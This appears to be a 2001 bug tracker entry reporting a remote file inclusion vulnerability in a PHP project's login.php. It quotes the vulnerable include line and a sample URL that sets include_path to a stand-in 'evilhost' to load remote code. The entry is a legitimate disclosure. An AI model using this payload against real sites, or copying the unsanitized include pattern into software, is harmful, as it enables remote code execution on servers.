e.g., login.php contains the following line:
include("$include_path/plugins/$plugin/function.php");
The $include_path can be set by anyone:
http://foo/login.php?mainfile=1&include_path=http://evilhost/
This exploit works on the demo site.
Nobody/Anonymous ( nobody ) - 2001-07-12 13:35
9
Closed
Later
Fred Hirsch
Core Features
Alpha Development
Public
|
Date: 2001-07-16 13:12 Logged In: YES |
| Field | Old Value | Date | By |
|---|---|---|---|
| status_id | Open | 2001-07-16 13:12 | webmosher |
| resolution_id | None | 2001-07-16 13:12 | webmosher |
| category_id | None | 2001-07-16 13:12 | webmosher |
| artifact_group_id | None | 2001-07-16 13:12 | webmosher |
| priority | 5 | 2001-07-16 13:12 | webmosher |
| assigned_to | nobody | 2001-07-16 13:12 | webmosher |
| close_date | - | 2001-07-16 13:12 | webmosher |
Copyright © 2010 Geeknet, Inc. All rights reserved. Terms of Use